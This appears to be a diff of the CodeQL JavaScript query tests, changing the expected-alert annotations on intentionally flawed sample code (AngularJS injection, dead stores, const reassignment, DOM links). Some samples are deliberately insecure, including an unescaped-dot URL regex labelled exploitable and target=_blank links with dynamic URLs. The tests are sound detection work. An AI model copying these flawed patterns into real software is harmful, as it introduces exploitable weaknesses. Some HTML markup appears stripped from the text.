/http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) + /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) ]); }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; @@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js @@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js @@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..d1049d6bf1d9 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html @@ -4,13 +4,12 @@ - - Help + Help - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
    - - Help + Help
    diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..aec3870ab04d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,19 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
    ; var div2 =
    ; -// not OK -Semmle; +Semmle; // $ Alert -// not OK -Semmle; +Semmle; // $ Alert -// not OK -
    ; +
    ; // $ Alert
    ; -// not OK -Semmle; +Semmle; // $ Alert + -// OK
    ; -// not OK -var div3 =
    ; +var div3 =
    ; // $ Alert -// not OK -var div4 =
    ; +var div4 =
    ; // $ Alert diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..38ec3b464087 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,7 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK + Example; Example; Example; @@ -9,42 +9,39 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; +Example; // $ Alert - because of dynamic URL Example; Example; function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK + var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK + var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +49,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..356f0e111a06 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,10 +1,10 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..97886fd35f0f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1,2 @@ -// OK + const s = "there"; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..b53a987d8a4e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,23 +1,19 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..7f06809d2f3f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,30 @@ -// NOT OK -g = 23; +g = 23; // $ Alert + -// OK h = 23; alert(h); -// OK + uid = 0; function incr() { return uid++; } -// OK + function foo() { var x; x = 0; } -// OK + onload = function() {} -// OK + global = 42; -// OK + prop = 42; -// OK + /*global otherGlobal*/ otherGlobal = 56; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js @@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts @@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..13e260a5de0e 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,7 +35,7 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } @@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -134,7 +132,7 @@ function v() { return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..0b99d597f477 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js @@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { @@ -16,14 +16,13 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { x = 42; } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..26246c9cbf14 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { @@ -82,31 +82,31 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; @@ -115,24 +115,24 @@ o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..1e53a3a4a0f0 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; // $ Alert +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js 